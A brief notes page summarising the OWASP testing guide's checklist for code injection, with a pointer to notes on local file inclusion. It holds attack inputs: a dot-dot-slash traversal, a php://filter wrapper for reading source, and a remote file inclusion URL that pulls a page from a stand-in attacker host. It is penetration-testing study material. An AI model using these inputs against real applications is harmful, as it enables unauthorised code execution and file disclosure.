Skip to content

Testing for Code Injection

OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.11. Testing for Code Injection

ID Link to Hackinglife Link to OWASP Description
7.11 WSTG-INPV-11 Testing for Code Injection - Identify injection points where you can inject code into the application. - Check LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource). - Check RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page - Assess the injection severity.

Local File Inclusion

See my notes on Local File Inclusion

Last update: 2024-04-03
Created: December 26, 2023 19:00:18